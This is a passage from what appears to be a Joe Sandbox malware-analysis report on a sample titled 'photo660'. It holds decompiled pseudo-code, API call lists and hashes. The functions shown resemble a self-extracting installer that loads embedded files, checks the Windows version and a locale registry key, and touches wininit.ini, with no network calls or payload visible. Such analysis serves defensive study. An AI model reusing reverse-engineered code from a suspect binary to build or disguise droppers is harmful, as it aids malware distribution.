					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0xa9a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E00A9171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00A96CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                        0x00a96298
                                                                                                                                                                                                        0x00a962a0
                                                                                                                                                                                                        0x00a962a7
                                                                                                                                                                                                        0x00a962ad
                                                                                                                                                                                                        0x00a962af
                                                                                                                                                                                                        0x00a962bb
                                                                                                                                                                                                        0x00a962c3
                                                                                                                                                                                                        0x00a962c4
                                                                                                                                                                                                        0x00a9633b
                                                                                                                                                                                                        0x00a9633b
                                                                                                                                                                                                        0x00a96345
                                                                                                                                                                                                        0x00a9634d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a962da
                                                                                                                                                                                                        0x00a962de
                                                                                                                                                                                                        0x00a9635f
                                                                                                                                                                                                        0x00a96369
                                                                                                                                                                                                        0x00a962e0
                                                                                                                                                                                                        0x00a962e0
                                                                                                                                                                                                        0x00a962e0
                                                                                                                                                                                                        0x00a962e3
                                                                                                                                                                                                        0x00a962e5
                                                                                                                                                                                                        0x00a962e5
                                                                                                                                                                                                        0x00a962e8
                                                                                                                                                                                                        0x00a962e8
                                                                                                                                                                                                        0x00a962ea
                                                                                                                                                                                                        0x00a962eb
                                                                                                                                                                                                        0x00a962ef
                                                                                                                                                                                                        0x00a962f1
                                                                                                                                                                                                        0x00a962f3
                                                                                                                                                                                                        0x00a96302
                                                                                                                                                                                                        0x00a96308
                                                                                                                                                                                                        0x00a9630d
                                                                                                                                                                                                        0x00a96314
                                                                                                                                                                                                        0x00a96314
                                                                                                                                                                                                        0x00a96316
                                                                                                                                                                                                        0x00a96319
                                                                                                                                                                                                        0x00a96355
                                                                                                                                                                                                        0x00a96357
                                                                                                                                                                                                        0x00a9631b
                                                                                                                                                                                                        0x00a9631b
                                                                                                                                                                                                        0x00a96331
                                                                                                                                                                                                        0x00a96334
                                                                                                                                                                                                        0x00a96339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96339
                                                                                                                                                                                                        0x00a96319
                                                                                                                                                                                                        0x00a9636b
                                                                                                                                                                                                        0x00a9637d
                                                                                                                                                                                                        0x00a9637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A962CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A962D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A9631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A96345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A96357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: ee5a81924b581b5bbcbbf001d3dbac559f4bf7d7419236a9dc5013a16f015b20
                                                                                                                                                                                                        • Instruction ID: 68fd33d2768a97667c23c2560d60545a4170604dfd600887d50fa6f1f0419a1b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee5a81924b581b5bbcbbf001d3dbac559f4bf7d7419236a9dc5013a16f015b20
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E521D675B00219ABDF10DFA49C459FF7BB8FF48714B10421AF902A7241DB359D068BE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A9681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A9681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0xa98004; // 0x6298f871
				_v8 = _t19 ^ _t44;
				_t41 =  *0xa981d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xa981d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xa981d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0xa91140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E00A966F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xa981d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00A96CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                        0x00a9681f
                                                                                                                                                                                                        0x00a9682a
                                                                                                                                                                                                        0x00a96831
                                                                                                                                                                                                        0x00a96836
                                                                                                                                                                                                        0x00a9683c
                                                                                                                                                                                                        0x00a9683e
                                                                                                                                                                                                        0x00a96848
                                                                                                                                                                                                        0x00a96851
                                                                                                                                                                                                        0x00a9685d
                                                                                                                                                                                                        0x00a96864
                                                                                                                                                                                                        0x00a96876
                                                                                                                                                                                                        0x00a9693a
                                                                                                                                                                                                        0x00a9693a
                                                                                                                                                                                                        0x00a9687c
                                                                                                                                                                                                        0x00a9687e
                                                                                                                                                                                                        0x00a96885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a968d6
                                                                                                                                                                                                        0x00a968f4
                                                                                                                                                                                                        0x00a96900
                                                                                                                                                                                                        0x00a96902
                                                                                                                                                                                                        0x00a9690a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9690c
                                                                                                                                                                                                        0x00a9690c
                                                                                                                                                                                                        0x00a9691c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9691e
                                                                                                                                                                                                        0x00a96924
                                                                                                                                                                                                        0x00a9692b
                                                                                                                                                                                                        0x00a96932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9692b
                                                                                                                                                                                                        0x00a9691c
                                                                                                                                                                                                        0x00a9690a
                                                                                                                                                                                                        0x00a96885
                                                                                                                                                                                                        0x00a96876
                                                                                                                                                                                                        0x00a96951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A9686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00A968A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A968CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,?,0000000C), ref: 00A968F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00A96902
                                                                                                                                                                                                          • Part of subcall function 00A966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A9691A), ref: 00A96741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00A968C2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: 394f5b5b3d6bf70c7fae195a11315303d4fee2daabbb5c9c992bbd3717dedee9
                                                                                                                                                                                                        • Instruction ID: f31bc48d3086a8524752c9bac01b5c9b7f8d7cc2cbc704b9ac50040698d54771
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 394f5b5b3d6bf70c7fae195a11315303d4fee2daabbb5c9c992bbd3717dedee9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7314F31B002289FDF21CB55CC45FAAB7F8EF46764F1001A7E949A6250DF319E86CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A93A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A93A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00A9468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xa98d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00A9468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xa98d4c, "<None>") == 0) {
							LocalFree( *0xa98d4c);
							L9:
							 *0xa99124 = 0;
							return 1;
						}
						_t9 = E00A96517(_t19, 0x7d1, 0, E00A93100, 0, 0);
						LocalFree( *0xa98d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xa99124 = 0x800704c7;
						L2:
						return 0;
					}
					E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xa98d4c);
					 *0xa99124 = 0x80070714;
					goto L2;
				}
				E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xa99124 = E00A96285();
				goto L2;
			}






                                                                                                                                                                                                        0x00a93a46
                                                                                                                                                                                                        0x00a93a57
                                                                                                                                                                                                        0x00a93a5d
                                                                                                                                                                                                        0x00a93a63
                                                                                                                                                                                                        0x00a93a6a
                                                                                                                                                                                                        0x00a93a91
                                                                                                                                                                                                        0x00a93a9a
                                                                                                                                                                                                        0x00a93ad8
                                                                                                                                                                                                        0x00a93b13
                                                                                                                                                                                                        0x00a93b19
                                                                                                                                                                                                        0x00a93b1b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93b21
                                                                                                                                                                                                        0x00a93ae7
                                                                                                                                                                                                        0x00a93af4
                                                                                                                                                                                                        0x00a93afc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93afe
                                                                                                                                                                                                        0x00a93a87
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93a87
                                                                                                                                                                                                        0x00a93aa8
                                                                                                                                                                                                        0x00a93ab3
                                                                                                                                                                                                        0x00a93ab9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93ab9
                                                                                                                                                                                                        0x00a93a78
                                                                                                                                                                                                        0x00a93a82
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F64,?,00000002,00000000), ref: 00A93A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A93AB3
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A93AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00A93B13
                                                                                                                                                                                                          • Part of subcall function 00A96517: FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                          • Part of subcall function 00A96517: LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                          • Part of subcall function 00A96517: DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                          • Part of subcall function 00A96517: FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00A93100,00000000,00000000), ref: 00A93AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: 1aacf7d80322dd905b411099c421db7e7fa6dba2109bcfac5c14db05e56fd048
                                                                                                                                                                                                        • Instruction ID: 98318f727bb73aafedb58aeede02570f0399a171cc3d43f1c67c1eca53528564
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1aacf7d80322dd905b411099c421db7e7fa6dba2109bcfac5c14db05e56fd048
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E1187713002017BDF20EBB69D09E1B39F9EBD9B40B10452FB545D95E1DE7D88028664
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A924E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A924E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xa98004; // 0x6298f871
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00A9658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00A96CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                        0x00a924e0
                                                                                                                                                                                                        0x00a924eb
                                                                                                                                                                                                        0x00a924f2
                                                                                                                                                                                                        0x00a924f7
                                                                                                                                                                                                        0x00a92504
                                                                                                                                                                                                        0x00a9250e
                                                                                                                                                                                                        0x00a9251d
                                                                                                                                                                                                        0x00a9252c
                                                                                                                                                                                                        0x00a92541
                                                                                                                                                                                                        0x00a92546
                                                                                                                                                                                                        0x00a92553
                                                                                                                                                                                                        0x00a92555
                                                                                                                                                                                                        0x00a92555
                                                                                                                                                                                                        0x00a92546
                                                                                                                                                                                                        0x00a9256c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A92506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A9252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 00A9253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A9254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00A92555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: f274ff481c6bee733d8d05c8a2082352ddf8c4704a90475eaffe8349a4bdad96
                                                                                                                                                                                                        • Instruction ID: 357c63d99e9016ce82ebfe238483f70368993fbcd5c6f908e5f4cfa7ded4f3b6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f274ff481c6bee733d8d05c8a2082352ddf8c4704a90475eaffe8349a4bdad96
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C01523670011867CB20EBA59D09EDB7BBCEB95750F010166FA49D3190DE748E46CAD1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A936EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00A936EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0xa98004; // 0x6298f871
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xa98184 = 1;
						 *0xa98180 = 1;
						L13:
						 *0xa99a40 = _t119;
						L14:
						__eflags =  *0xa98a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00A92A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00A92A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xa98a38 & 0x00000001;
											if(( *0xa98a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("photo660");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00A9681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "photo660", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00A967C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00A928E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0xa99a40 = _t119;
						 *0xa98184 = 1;
						 *0xa98180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0xa99a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0xa98184 = _t135;
							 *0xa98180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
